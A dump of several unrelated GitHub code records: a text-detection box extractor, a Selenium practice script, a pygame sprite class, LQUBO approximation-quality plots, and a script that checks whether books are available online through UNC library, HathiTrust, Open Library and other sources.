self.boxes_from_bitmap(\n _pred['binary'][batch_index],\n segmentation[batch_index], width, height)\n boxes_batch.append(boxes)\n preds.append(single_pred.reshape(1, *single_pred.shape))\n return boxes_batch, _pred\n\n def binarize(self, pred):\n return pred > self.thresh\n\n def boxes_from_bitmap(self, pred, _bitmap, dest_width, dest_height):\n '''\n _bitmap: single map with shape (1, H, W),\n whose values are binarized as {0, 1}\n '''\n assert _bitmap.size(0) == 1\n bitmap = _bitmap.data.cpu().numpy()[0] # The first channel\n pred = pred.cpu().detach().numpy()[0]\n height, width = bitmap.shape\n boxes = []\n _, contours, _ = cv2.findContours(\n (bitmap*255).astype(np.uint8),\n cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)\n\n if self.debug:\n bitmap = cv2.cvtColor(pred * 255, cv2.COLOR_GRAY2BGR)\n\n for contour in contours[:self.max_candidates]:\n points, sside = self.get_mini_boxes(contour)\n if sside < self.min_size:\n continue\n points = np.array(points)\n score = self.box_score_fast(pred, points.reshape(-1, 2))\n\n if self.debug:\n points = points.astype(np.int32)\n bitmap = cv2.polylines(\n bitmap, [points.reshape(-1, 2)], True, (255, 0, 0), 3)\n bitmap = cv2.putText(\n bitmap, str(round(score, 3)),\n (points[:, 0].min(), points[:, 1].min()),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0))\n if self.box_thresh > score:\n continue\n box = self.unclip(points).reshape(-1, 1, 2)\n box, sside = self.get_mini_boxes(box)\n if sside < self.min_size + 2:\n continue\n box = np.array(box)\n\n if not self.resize:\n dest_width = width\n dest_height = height\n\n box[:, 0] = np.clip(\n np.round(box[:, 0] / width * dest_width), 0, dest_width)\n box[:, 1] = np.clip(\n np.round(box[:, 1] / height * dest_height), 0, dest_height)\n boxes.append(box.tolist())\n\n if self.debug:\n webcv2.imshow('mask', bitmap)\n return boxes, bitmap\n\n def unclip(self, box):\n poly = Polygon(box)\n distance = poly.area * 1.5 / poly.length\n offset = pyclipper.PyclipperOffset()\n offset.AddPath(box, pyclipper.JT_ROUND, pyclipper.ET_CLOSEDPOLYGON)\n expanded = np.array(offset.Execute(distance))\n return expanded\n\n def get_mini_boxes(self, contour):\n bounding_box = cv2.minAreaRect(contour)\n points = sorted(list(cv2.boxPoints(bounding_box)), key=lambda x: x[0])\n\n index_1, index_2, index_3, index_4 = 0, 1, 2, 3\n if points[1][1] > points[0][1]:\n index_1 = 0\n index_4 = 
1\n else:\n index_1 = 1\n index_4 = 0\n if points[3][1] > points[2][1]:\n index_2 = 2\n index_3 = 3\n else:\n index_2 = 3\n index_3 = 2\n\n box = [points[index_1], points[index_2],\n points[index_3], points[index_4]]\n return box, min(bounding_box[1])\n\n def box_score(self, bitmap, box):\n '''\n naive version of box score computation,\n only for helping principle understand.\n '''\n mask = np.zeros_like(bitmap, dtype=np.uint8)\n cv2.fillPoly(mask, box.reshape(1, 4, 2).astype(np.int32), 1)\n return cv2.mean(bitmap, mask)[0]\n\n def box_score_fast(self, bitmap, _box):\n h, w = bitmap.shape[:2]\n box = _box.copy()\n xmin = np.clip(np.floor(box[:, 0].min()).astype(np.int), 0, w - 1)\n xmax = np.clip(np.ceil(box[:, 0].max()).astype(np.int), 0, w - 1)\n ymin = np.clip(np.floor(box[:, 1].min()).astype(np.int), 0, h - 1)\n ymax = np.clip(np.ceil(box[:, 1].max()).astype(np.int), 0, h - 1)\n\n mask = np.zeros((ymax - ymin + 1, xmax - xmin + 1), dtype=np.uint8)\n box[:, 0] = box[:, 0] - xmin\n box[:, 1] = box[:, 1] - ymin\n cv2.fillPoly(mask, box.reshape(1, -1, 2).astype(np.int32), 1)\n return cv2.mean(bitmap[ymin:ymax+1, xmin:xmax+1], mask)[0]\n","repo_name":"Megvii-CSG/MegReader","sub_path":"structure/representers/seg_detector_representer.py","file_name":"seg_detector_representer.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","stars":344,"dataset":"github-code","pt":"27"} +{"seq_id":"10458838890","text":"import time\n\nfrom selenium import webdriver\nimport os\n\nclass DynamicXpath():\n\n def _prepare_driver(self):\n driver_location = 'C:\\\\Users\\\\BlazejW\\\\selenium\\\\chromedriver.exe'\n os.environ['webdriver.chrome.driver'] = driver_location\n driver = webdriver.Chrome(driver_location)\n driver.get('https://learn.letskodeit.com/')\n return driver\n\n def test(self):\n driver = self._prepare_driver()\n driver.find_element_by_partial_link_text('Login').click()\n driver.implicitly_wait(5)\n\n driver.find_element_by_id('user_email').send_keys('test@email.com')\n driver.find_element_by_id('user_password').send_keys('abcabc')\n driver.find_element_by_xpath('//*[@id=\"new_user\"]/div[3]/input').click()\n\n driver.find_element_by_partial_link_text('All Courses').click()\n time.sleep(3)\n #driver.find_element_by_id('search-courses').send_keys('Java Script')\n\n #dynamic xpath\n _course = '//div[contains(@class, \"course-listing-title\")and contains(text(), \"{0}\")]'\n _course_locator = _course.format('JavaScript for beginners')\n\n element = driver.find_element_by_xpath(_course_locator)\n print(element)\n element.click()\n time.sleep(5)\n\nchrome_aut = DynamicXpath()\nchrome_aut.test()","repo_name":"bwielk/SeleniumAutomation","sub_path":"browser_interactions/dynamic_xpath.py","file_name":"dynamic_xpath.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36128174652","text":"from classes.game_object import GameObject\nimport pygame\nimport time\n\nclass Gorilla(GameObject):\n\tdef __init__(self, screen, left, top):\n\t\tself.top = top\n\t\tself.left = left\n\t\tself.screen = screen\n\t\tself.pos = (left, top)\n\t\tsuper(Gorilla, self).__init__(screen, self.pos)\n\t\n\tdef idle(self):\n\t\t# Get image from the source\n\t\timg = pygame.image.load(\"sprites\\\\gorilla-idle.png\").convert_alpha()\n\t\t\n\t\tself.screen.blit(img, self.pos)\n\t\n\tdef throw(self):\n\t\t# Get image from the source\n\t\timg = 
pygame.image.load(\"sprites\\\\gorilla-throwing.png\").convert_alpha()\n\t\t\n\t\t\n\t\tself.screen.blit(img, self.pos)\n\t\t# Throw banana(unimplemented feature)\n\t\ttime.sleep(2/3)\n\t\tself.idle()\n\t","repo_name":"ParsaDarbandsari/gorilla-game","sub_path":"classes/gorilla.py","file_name":"gorilla.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"42979720327","text":"import numpy as np\nfrom utilities.objective_functions import TSPObjectiveFunction\nfrom switch_network_LQUBO.switch_networks.switch_networks import SortingNetwork, PermutationNetwork\nfrom switch_network_LQUBO.form_LQUBO.form_LQUBO import LQUBO\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MaxNLocator\nfrom scipy import stats\nax = plt.figure().gca()\n\n\nclass ObjectiveFunction:\n def __init__(self, objective_function=None):\n if objective_function:\n self.objective_function = objective_function\n else:\n raise AttributeError('Objective function missing.')\n\n\nclass LocalQUBOQuality(ObjectiveFunction):\n \"\"\"\n For a specified objective function and LQUBO type, LocalQUBOQuality class has 2 useful visual functions that can\n be run from the command line.\n\n\n\n \"\"\"\n def __init__(self,\n objective_function=None,\n max_hd=None,\n activation_vector_hamming_dist=1,\n num_points=None,\n num_activation_vectors=None,\n network_type='minimum'):\n super().__init__(objective_function=objective_function)\n\n # Initialize switch network:\n # The default behavior here is to choose the smaller of either permutation or\n # sorting networks for the given input size.\n self.n_qap = self.objective_function.n\n\n if network_type == 'sorting':\n self.network = SortingNetwork(self.n_qap)\n elif network_type == 'permutation':\n self.network = PermutationNetwork(self.n_qap)\n elif network_type == 'minimum':\n s = SortingNetwork(self.n_qap)\n p = PermutationNetwork(self.n_qap)\n if s.depth <= p.depth:\n self.network = s\n else:\n self.network = p\n else:\n raise TypeError('Network type {} not recognized'.format(str(network_type)))\n\n if num_activation_vectors:\n self.n_qubo = num_activation_vectors\n else:\n self.n_qubo = self.network.depth\n\n if num_points:\n self.num_points = num_points\n else:\n self.num_points = 200\n\n # Initialize random bitstring\n self.q = np.random.randint(0, 2, size=self.n_qubo)\n self.p = self.network.permute(self.q)\n self.v = self.objective_function(self.p)\n self.activation_vec_hd = activation_vector_hamming_dist\n\n if type(objective_function) == TSPObjectiveFunction:\n self.OF_type = 'TSP'\n else:\n self.OF_type = 'QAP'\n\n self.max_hd = max_hd\n\n self.form_qubo = LQUBO(objective_function=self.objective_function,\n switch_network=self.network,\n num_activation_vectors=self.n_qubo,\n activation_vec_hamming_dist=self.activation_vec_hd,\n max_hamming_dist=self.max_hd).form_lqubo(self.q)\n\n self.qubo = np.zeros((self.n_qubo, self.n_qubo))\n self.basis_matrix = []\n\n for i in range(self.n_qubo):\n self.basis_matrix.append(self.form_qubo[1][i])\n\n self.additive_constant = self.form_qubo[2]\n for i in range(self.n_qubo):\n for j in range(self.n_qubo):\n if i <= j:\n self.qubo[i][j] = self.form_qubo[0][(i, j)]\n\n def q_q_plot(self, hamming_dist):\n\n \"\"\"\n Given a specified hamming dist (int), q_q_plot will produce a Q-Q scatter plot of the LQUBO change in objective\n function versus the actual change in objective function.\n \"\"\"\n\n if hamming_dist:\n hamming_dist = 
hamming_dist\n else:\n raise AttributeError('Hamming dist missing.')\n\n def swap(input_list, first_entry, second_entry):\n input_list[first_entry], input_list[second_entry] = input_list[second_entry], input_list[first_entry]\n return input_list\n\n def random_binary(binary):\n for index in range(hamming_dist):\n swap(binary, index, np.random.randint(self.n_qubo))\n return binary\n\n # delta q of specified hamming dist\n hd = []\n x = []\n y = []\n\n for i in range(self.num_points):\n hd.append(np.zeros(self.n_qubo))\n\n for i in range(len(hd)):\n for j in range(hamming_dist):\n hd[i][j] = 1\n # only swap first n_qubo qubits to preserve total weight qubit\n random_binary(hd[i][:self.n_qubo])\n\n for vec in hd:\n q_new = np.mod(self.q + np.matmul(vec[:self.n_qubo], self.basis_matrix), 2)\n p_new = self.network.permute(q_new)\n v_new = self.objective_function(p_new)\n x.append(v_new - self.v)\n y.append(np.matmul(np.matmul(vec, self.qubo), np.transpose(vec)) + self.additive_constant)\n\n plt.scatter(x, y, label='HD = {}'.format(hamming_dist))\n\n plt.xlabel(\"true delta obj\")\n plt.ylabel(\"local qubo delta obj\")\n plt.title('n = {} {}, Activation Vector HD = {} '.format(self.n_qap, self.OF_type, self.activation_vec_hd))\n\n plt.axhline(y=0, color='k')\n plt.axvline(x=0, color='k')\n plt.legend(loc='upper left')\n plt.show()\n\n def plot_r_squared(self):\n\n \"\"\"\n plot_r_squared function will take objective function from the base class and produce multiple scatter plots to\n retrieve the R squared value for a specified hamming distance. Then for a hamming dist from 1 to 20 it will\n produce a plot of the R squared val versus the input hamming dist.\n \"\"\"\n\n def swap(input_list, first_entry, second_entry):\n input_list[first_entry], input_list[second_entry] = input_list[second_entry], input_list[first_entry]\n return input_list\n\n def random_binary(binary):\n for index in range(hamming_dist):\n swap(binary, index, np.random.randint(self.n_qubo))\n return binary\n\n r_val = []\n hamming_weight = []\n for hamming_dist in range(20):\n\n hamming_dist = hamming_dist + 1\n hd = []\n x = []\n y = []\n\n for i in range(self.num_points):\n hd.append(np.zeros(self.n_qubo))\n\n for i in range(len(hd)):\n for j in range(hamming_dist):\n hd[i][j] = 1\n random_binary(hd[i])\n\n for vec in hd:\n q_new = np.mod(self.q + np.matmul(vec, self.basis_matrix), 2)\n p_new = self.network.permute(q_new)\n v_new = self.objective_function(p_new)\n x.append(v_new - self.v)\n y.append(np.matmul(np.matmul(vec, self.qubo), np.transpose(vec)))\n\n slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)\n r_val.append(r_value**2)\n hamming_weight.append(hamming_dist)\n\n plt.plot(hamming_weight, r_val, label='n = {} {}, activation vector HD = {}'.format(self.n_qap,\n self.OF_type,\n self.activation_vec_hd))\n\n plt.scatter(hamming_weight, r_val)\n plt.xticks(hamming_weight)\n plt.xlabel(\"Hamming dist\")\n plt.ylabel(\"R Squared\")\n plt.title('Hamming dist of LQUBO vs R Squared of scatter plot')\n plt.legend(loc='best')\n ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n plt.show()\n\n\n","repo_name":"seangholson/lqubo","sub_path":"switch_network_LQUBO/quality_of_LQUBO_and_methods/approx_quality.py","file_name":"approx_quality.py","file_ext":"py","file_size_in_byte":7642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"25887966046","text":"\n###Version of online request searcher\n###for general use; takes in user input\nimport 
requests, bs4, xlrd, re\n\nstopwords = ('a', 'able', 'all', 'also', 'am', 'an', 'and', 'any', 'are', 'as', 'ask', 'at', 'away',\n 'b', 'be', 'been', 'best', 'both', 'but', 'by', 'c', 'came', 'can', 'cant', 'co', 'com', 'come',\n 'd', 'did', 'do', 'does', 'done', 'down', 'e', 'each', 'edu', 'eg', 'else', 'et', 'etc', 'even', 'ever', 'ex',\n 'f', 'far', 'few', 'five', 'for', 'four', 'from', 'g', 'get', 'gets', 'go', 'goes', 'gone', 'got',\n 'h', 'had', 'has', 'have', 'he', 'help', 'her', 'here', 'hers', 'hi', 'him', 'his', 'how',\n 'i', 'ie', 'if', 'in', 'inc', 'into', 'is', 'it', 'its', 'j', 'just', 'k', 'keep', 'kept', 'know',\n 'l', 'last', 'less', 'lest', 'let', 'like', 'look', 'ltd', 'm', 'many', 'may', 'me', 'mean', 'more',\n 'most', 'much', 'must', 'my', 'n', 'name', 'nd', 'near', 'need', 'new', 'next', 'nine', 'no', 'non', 'none',\n 'nor', 'not', 'now', 'o', 'of', 'off', 'oh', 'ok', 'okay', 'old', 'on', 'once', 'one', 'ones', 'only', 'onto',\n 'or', 'our', 'ours', 'out', 'over', 'own', 'p', 'per', 'plus', 'q', 'que', 'qv', 'r', 'rd', 're', 's', 'said',\n 'same', 'saw', 'say', 'says', 'see', 'seem', 'seen', 'self', 'sent', 'she', 'six', 'so', 'some', 'soon', 'sub',\n 'such', 'sup', 'sure', 't', 'take', 'tell', 'th', 'than', 'that', 'the', 'them', 'then', 'they', 'this', 'thru',\n 'thus', 'to', 'too', 'took', 'try', 'two', 'u', 'un', 'unto', 'up', 'upon', 'us', 'use', 'used', 'uses',\n 'uucp', 'v', 'very', 'via', 'viz', 'vs', 'w', 'want', 'was', 'way', 'we', 'well', 'went', 'were', 'what',\n 'when', 'who', 'whom', 'why', 'will', 'wish', 'with', 'x', 'y', 'yes', 'yet', 'you', 'your', 'z', 'zero')\n\ns = requests.Session()\n\n#UNC catalog function\ndef unc_searcher(title,author):\n # helper string\n oncheck = \"onlinefulltextavailable\"\n #compile regular expression\n regex = re.compile('[^a-zA-Z]')\n #string editing to make query\n title = title.lower()\n title = title.replace(\" \", \"+\")\n author = author.lower()\n author = author.replace(\" \", \"+\")\n #query for unc url\n query = title + \"+\" + author\n unc_url = \"https://catalog.lib.unc.edu/?utf8=%E2%9C%93&search_field=all_fields&q={query}&f%5Baccess_type_f%5D%5B%5D=Online\".format(\n query=query)\n unc_get = s.get(unc_url)\n #create bsoup object\n uncSoup = bs4.BeautifulSoup(unc_get.text, 'html.parser')\n #this is one way to select the items on the UNC page\n #using schema.org/Thing seemed like the best way\n unc_items = uncSoup.find_all(\"div\", {\"itemtype\": \"http://schema.org/Thing\"})\n\n title = regex.sub('', title)\n author = regex.sub('', author)\n #dictionary in case multiple links\n found_dic = {\"Found at UNC: \": []}\n unc_acc = 0\n for item in unc_items:\n search_soup = item.getText()\n search_clean = regex.sub('', search_soup)\n search_clean = search_clean.lower()\n if title in search_clean and author in search_clean and oncheck in search_clean:\n #for each item find all links\n link_elems = item.find_all(\"a\")\n link_urls = [x.get(\"href\") for x in link_elems]\n for url in link_urls:\n if url.startswith('/'):\n url = \"https://catalog.lib.unc.edu\" + url\n found_dic[\"Found at UNC: \"].append(url)\n unc_acc +=1\n\n if unc_acc > 0:\n return found_dic\n else:\n return \"Not found in UNC catalog.\"\n\n\n#hathi temp access searcher\ndef hathi_temp_access(title, author):\n title = title.lower()\n author = author.lower()\n title_unc = title.replace(\" \", \"+\")\n author_no_end_space = author.strip(\" \")\n author_unc = author_no_end_space.replace(\" \", \"+\")\n query = author_unc + \"+\" + title_unc\n hathi_url = 
\"https://catalog.lib.unc.edu/?utf8=%E2%9C%93&search_field=all_fields&q={query}&f%5Baccess_type_f%5D%5B%5D=Online\".format(\n query=query)\n hathi_get = s.get(hathi_url)\n hathiSoup = bs4.BeautifulSoup(hathi_get.text, 'html.parser')\n hathi_items = hathiSoup.find_all(\"div\", {\"itemtype\": \"http://schema.org/Thing\"})\n\n regex = re.compile('[^a-zA-Z]')\n title = regex.sub('', title)\n author = regex.sub('', author)\n #string for checking\n oncheck = \"temporarilyavailable\"\n hathi_dic = {\"Temporary access: \": []}\n hathi_acc = 0\n for item in hathi_items:\n search_soup = item.getText()\n search_clean = regex.sub('', search_soup)\n search_clean = search_clean.lower()\n if title in search_clean and author in search_clean and oncheck in search_clean:\n bib_num = item.get(\"data-document-id\")\n hathi_url = \"https://catalog.lib.unc.edu/catalog/\" + bib_num\n hathi_dic[\"Temporary access: \"].append(hathi_url)\n hathi_acc +=1\n\n if hathi_acc > 0:\n return hathi_dic\n else:\n return \"Not found in HathiTemp Access\"\n\n\n# search actual hathitrust site for always accessible\ndef hathi_full_time_access(title,author):\n title = title.lower()\n author = author.lower()\n author = author.strip(\" \")\n title_query = title.replace(\" \",\"+\")\n author_query = author.replace(\" \",\"+\")\n query = title_query + \"+\" + author_query\n ht_url = \"https://catalog.hathitrust.org/Search/Home?lookfor={query}&ft=ft&setft=true\".format(\n query=query)\n ht_page = s.get(ht_url)\n htSoup = bs4.BeautifulSoup(ht_page.text, 'html.parser')\n records = htSoup.select('.record')\n\n if len(records) > 0:\n hathi_acc = 0\n # get text for each record\n records_list = [x.getText() for x in records]\n # cleanup using regular expressions\n regex = re.compile('[^a-zA-Z]')\n record_clean_list = []\n for record in records_list:\n record_clean = regex.sub('', record)\n record_clean = record_clean.lower()\n record_clean_list.append(record_clean)\n # clean our search terms\n title_caps = regex.sub('', title)\n title_test = title_caps.lower()\n author_caps = regex.sub('', author)\n author_test = author_caps.lower()\n\n for record in record_clean_list:\n if title_test in record and author_test in record:\n hathi_acc += 1\n if hathi_acc > 0:\n return \"Found in HathiTrust fulltime access.\", ht_url\n else:\n return \"Not found in HathiTrust fulltime access.\"\n\n else:\n return \"Not found in HathiTrust fulltime access.\"\n\n\n###function for red_shelf_access\n###pretty much works\ndef red_shelf_access(title,author):\n title = title.lower()\n author = author.lower()\n query = title + \" \" + author\n red_query = query.replace(\" \", \"+\")\n red_shelf_url = 'https://studentresponse.redshelf.com/search/?terms=%s' %red_query\n red_shelf = s.get(red_shelf_url)\n \n redSoup = bs4.BeautifulSoup(red_shelf.text,'html.parser')\n red_items = redSoup.select(\".price-content\")\n if len(red_items) > 0:\n if \"Borrow through\" in red_items[0].getText():\n title_items = redSoup.select(\".title-row\")\n #print(title_items[0].getText())\n t1 = title_items[0].getText()\n #remove stopwords\n t1 = t1.lower()\n t1_list = t1.split()\n t1_no_stop = [word for word in t1_list if not word in stopwords]\n t2 = \"\".join(t1_no_stop)\n #remove stopwords from query\n title_list = title.split()\n title_no_stop = [word for word in title_list if not word in stopwords]\n title_nospace = \"\".join(title_no_stop)\n\n if title_nospace in t2:\n \n return \"Found in Red Shelf.\",red_shelf_url\n else:\n return \"Not found in Red Shelf.\"\n else:\n return \"Not 
found in Red Shelf\"\n else:\n return \"Not found in Red Shelf\"\n\n\n#open library function\ndef open_library_access(title,author):\n title_open = title.replace(\" \", \"+\")\n author_no_end_space = author.strip(\" \")\n author_open = author_no_end_space.replace(\" \", \"+\")\n open_lib_url = 'https://openlibrary.org/search?title=%s&author=%s' %(title_open, author_open)\n open_lib = s.get(open_lib_url)\n openSoup = bs4.BeautifulSoup(open_lib.text,'html.parser')\n if 'No results found.' in open_lib.text:\n return 'Not found in Open Library.'\n\n else:\n open_items_elem = openSoup.select('.searchResultItemCTA-lending')\n acc = 0\n for x in range(len(open_items_elem)):\n if 'Not in Library' in open_items_elem[x].getText():\n continue\n else:\n acc +=1\n if acc > 0:\n #print(title)\n #print(author)\n return 'Found in Open Library.',open_lib_url\n\n else:\n return 'Not found in Open Library.'\n\n\n#basic searcher for the different books with spreadsheets\ndef spread_sheet_searcher(title,author,books,title_col,author_col,db_name):\n title = title.lower()\n author = author.lower()\n regex = re.compile('[^a-zA-Z]')\n title = regex.sub('', title)\n author = regex.sub('', author)\n acc = 0\n for row in range(1, books.nrows):\n # string cleanup for each\n book_title = books.cell_value(row, title_col)\n book_title = regex.sub('', book_title)\n book_title = book_title.lower()\n author_title = books.cell_value(row, author_col)\n author_title = regex.sub('', author_title)\n author_title = author_title.lower()\n if title in book_title and author in author_title:\n acc += 1\n if acc > 0:\n return \"Found in \"+ db_name\n else:\n return \"Not found in \"+ db_name\n\n\n###searching michigan fulcrum project\ndef michigan_searcher(title,author,searchtext):\n regex = re.compile('[^a-zA-Z]')\n title_search = regex.sub('',title)\n title_search = title_search.lower()\n author_search = regex.sub('',author)\n author_search = author_search.lower()\n if title_search in searchtext and author_search in searchtext:\n return \"Found in Michigan Press Open Access.\"\n else:\n return \"Not found in Michigan Press Open Access.\"\n\n\n#right now only searching ISSNs\ndef textbook_searcher(tb_issn_col,issn):\n if issn == \"\":\n return \"Not found in Students Stores textbook spreadsheet.\"\n else:\n # scan every row before deciding the ISBN is absent (the old code\n # returned \"not found\" after checking only the first row)\n for row in range(1,textbooks.nrows):\n if issn == str(textbooks.cell_value(row,tb_issn_col)):\n vital_query = title.replace(\" \", \"%20\")\n vital_url = \"https://bookshelf.vitalsource.com/#/search?q=%s\" % vital_query\n return \"Found in Textbooks\", \"Could be available here: \" + vital_url\n return \"Not found in Students Stores textbook spreadsheet.\"\n\n\n#Project Gutenberg searcher\n#currently using database GUTINDEX.txt\ndef pg_searcher(title_input,author_input,file):\n regex = re.compile('[^a-zA-Z]')\n title = regex.sub('', title_input)\n author = regex.sub('', author_input)\n title = title.lower()\n author = author.lower()\n acc = 0\n for line in file:\n line = line.lower()\n line = regex.sub('',line)\n if title in line and author in line:\n acc +=1\n\n if acc > 0:\n query = title_input + ' ' + author_input\n query = query.replace(' ', '+')\n gutenberg_url = \"http://www.gutenberg.org/ebooks/search/?query=%s\" % query\n return \"Found at Project Gutenberg.\", gutenberg_url\n else:\n return \"Not found at Project Gutenberg.\"\n\nprint(\"\\t\" + \"\\t\" + \"Welcome to the UNC online access searcher. 
Enter title/author or ISBN to search.\")\nprint(\"\\t\" + \"\\t\" + \"\\t\" + \"\\t\" + \"(must include ISBN to search textbook database)\")\nprint(\" \")\nprint(\" \")\nprint(\"LOADING FILES\")\n\n#ask whether or not to load\n####db spreadsheets for the following\n#jstor_cont = input(\"Search JSTOR open content? (press y): \")\njstor_cont = 'y'\nif jstor_cont == \"y\":\n print('Loading JSTOR database.')\n try:\n jstor_workbook = xlrd.open_workbook('jstor_books.xlsx')\n jstor_books = jstor_workbook.sheet_by_index(0)\n jstorheadings = jstor_books.row_values(0)\n jstortitle_col = jstorheadings.index('Title')\n jstorauthor_col = jstorheadings.index('Authors')\n except FileNotFoundError:\n print(\"jstor spreadsheet not found.\")\n print(\"If file exists rename: jstor_books.xlsx, and restart program. \")\n input(\"Press enter to continue: \")\n jstor_cont = \"n\"\n\n#muse_cont = input(\"Search Project Muse? (press y): \")\nmuse_cont = 'y'\nif muse_cont == \"y\":\n print('Loading Project Muse database.')\n try:\n muse_workbook = xlrd.open_workbook(\"project_muse_free_covid_book.xlsx\")\n muse_books = muse_workbook.sheet_by_index(0)\n museheadings = muse_books.row_values(0)\n musetitle_col = museheadings.index('Title')\n museauthor_col = museheadings.index('Contributor')\n except FileNotFoundError:\n print(\"Project Muse spreadsheet not found.\")\n print(\"If file exists rename: project_muse_free_covid_book.xlsx, and restart program.\")\n input(\"Press enter to continue: \")\n muse_cont = \"n\"\n\n#ohio_cont = input(\"Search Ohio State Press? (press y): \")\nohio_cont = 'y'\nif ohio_cont == \"y\":\n print('Loading OSU Press database.')\n try:\n ohio_workbook = xlrd.open_workbook(\"OhioStateUnivPress-OpenTitles-KnowledgeBank.xlsx\")\n ohio_books = ohio_workbook.sheet_by_index(0)\n ohioheadings = ohio_books.row_values(0)\n ohiotitle_col = ohioheadings.index('Title')\n ohioauthor_col = ohioheadings.index('Contributors')\n except FileNotFoundError:\n print(\"Ohio State Press open titles spreadsheet not found.\")\n input(\"Press enter to continue: \")\n ohio_cont = 'n'\n\n#science_direct_cont = input(\"Science Direct? (press y): \")\nscience_direct_cont = 'y'\nif science_direct_cont == \"y\":\n print('Loading Science Direct database.')\n try:\n sd_workbook = xlrd.open_workbook(\"sciencedirect.xlsx\")\n sd_books = sd_workbook.sheet_by_index(0)\n sdheadings = sd_books.row_values(0)\n sdtitle_col = sdheadings.index(\"publication_title\")\n sdauthor_col = sdheadings.index(\"first_author\")\n except FileNotFoundError:\n print(\"Science Direct items spreadsheet not found.\")\n print(\"If file exists rename: sciencedirect.xlsx, and restart program.\")\n input(\"Press enter to continue: \")\n science_direct_cont = 'n'\n\n#michigan searcher\n#michigan_cont = input(\"Search Michigan Press? 
(press y): \")\nmichigan_cont = 'y'\nif michigan_cont == \"y\":\n print('Loading Michigan database.')\n fulcrum_searchtxt = \"\"\n regex = re.compile('[^a-zA-Z]')\n for n in range(1,13):\n fulcrum = s.get(\"https://www.fulcrum.org/michigan?locale=en&page={n}&per_page=1000&view=list\".format(n=n))\n fulcrumSoup = bs4.BeautifulSoup(fulcrum.text,'html.parser')\n fulcrumSouptags = fulcrumSoup.select(\"#documents\")\n fulcrumugly = fulcrumSouptags[0].getText()\n fulcrumtext = regex.sub('', fulcrumugly)\n fulcrumtext = fulcrumtext.lower()\n fulcrum_searchtxt = \"\".join([fulcrum_searchtxt,fulcrumtext])\n\n#vitalsource/textbook searcher\n#could be used for general textbook searching\n#vitalsource_cont = input(\"Search textbooks/vitalsource? (press y): \")\nvitalsource_cont = 'y'\nif vitalsource_cont == \"y\":\n print('Loading textbook database.')\n try:\n textbook_workbook = xlrd.open_workbook('Spring 2020 Book List.xlsx')\n textbooks = textbook_workbook.sheet_by_index(0)\n tb_issn_col = 2\n except FileNotFoundError:\n print(\"Textbooks spreadsheet not found.\")\n print(\"If file exists rename: Spring 2020 Book List.xlsx, and restart program.\")\n input(\"Press enter to continue: \")\n vitalsource_cont = 'n'\n\n#search gutenberg text file\n#gutenberg_cont = input(\"Search Project Gutenberg? (press y): \")\ngutenberg_cont = 'y'\nif gutenberg_cont == 'y':\n print('Loading Gutenberg database.')\n try:\n fin = open('GUTINDEX.txt', encoding=\"utf-8\")\n except FileNotFoundError:\n print(\"GUTINDEX.txt file not found.\")\n input(\"Press enter to continue: \")\n gutenberg_cont = 'n'\n\n###helper functions###\n#helper function for appending and printing\n#what is returned from functions\ndef return_helper(result,list):\n if result.__class__.__name__ == 'tuple':\n for item in result:\n print(item)\n list.append(item)\n elif result.__class__.__name__ == 'dict':\n for key in result:\n print(key)\n list.append(key)\n for elem in result[key]:\n print(elem)\n list.append(elem)\n else:\n print(result)\n list.append(result)\n\n\n#helper for converting list to textfile\ndef list_to_file(var_list,name):\n file_name = name + '.txt'\n #open file for writing\n outfile = open(file_name, 'w',encoding='utf-8')\n #write the list to file\n for item in var_list:\n outfile.write(item + '\\n')\n outfile.close()\n return file_name\n\nprint(\" \")\ncont = \"y\"\nwhile cont == \"y\":\n request = []\n title_long = input(\"Enter title: \")\n title_split = title_long.split(':')\n title = title_split[0]\n author_num = input(\"Enter author: \")\n author = \"\"\n if len(author_num) > 0:\n for i in author_num:\n if i.isalpha() or i.isspace():\n author = \"\".join([author, i])\n if vitalsource_cont == \"y\":\n issn = input('Enter ISBN: ')\n\n print(title.upper())\n request.append(title.upper())\n print(author)\n request.append(author)\n\n unc_result = unc_searcher(title,author)\n return_helper(unc_result,request)\n\n hathi_temp_result = hathi_temp_access(title,author)\n return_helper(hathi_temp_result,request)\n hathi_full_time_result = hathi_full_time_access(title,author)\n return_helper(hathi_full_time_result,request)\n\n open_library_result = open_library_access(title,author)\n return_helper(open_library_result,request)\n red_shelf_result = red_shelf_access(title,author)\n return_helper(red_shelf_result,request)\n\n if jstor_cont == \"y\":\n return_helper(spread_sheet_searcher(title,author,jstor_books,jstortitle_col,jstorauthor_col,\"JSTOR.\"),request)\n if muse_cont == \"y\":\n 
return_helper(spread_sheet_searcher(title,author,muse_books,musetitle_col,museauthor_col,\"Project Muse.\"),request)\n if ohio_cont == 'y':\n return_helper(spread_sheet_searcher(title,author,ohio_books,ohiotitle_col,ohioauthor_col,\"Ohio State Uni Press.\"),request)\n if science_direct_cont == 'y':\n return_helper(spread_sheet_searcher(title,author,sd_books,sdtitle_col,sdauthor_col,\"Science Direct Holdings.\"),request)\n if michigan_cont == \"y\":\n return_helper(michigan_searcher(title,author,fulcrum_searchtxt),request)\n if vitalsource_cont == \"y\":\n return_helper(textbook_searcher(tb_issn_col,issn),request)\n if gutenberg_cont == \"y\":\n return_helper(pg_searcher(title,author,fin),request)\n print('----------------')\n request.append('----------------')\n list_to_file(request,title + \"_\" \"results\")\n\n print(\"Another search? (press y) Enter any other button to exit.\")\n cont = input(\"Enter: \")\n\n","repo_name":"jonpage3/open_access_searchers","sub_path":"online_request_searcher.py","file_name":"online_request_searcher.py","file_ext":"py","file_size_in_byte":19420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26102579621","text":"APP_NAME = 'User Migration Tool'\nTHEME = 'blue'\nMODE = 'Dark'\nDEFAULT_SIZE = '800x600'\nFONT_NAME = 'Consolas'\nSELECT_SCRIPT_LABEL = 'SELECT 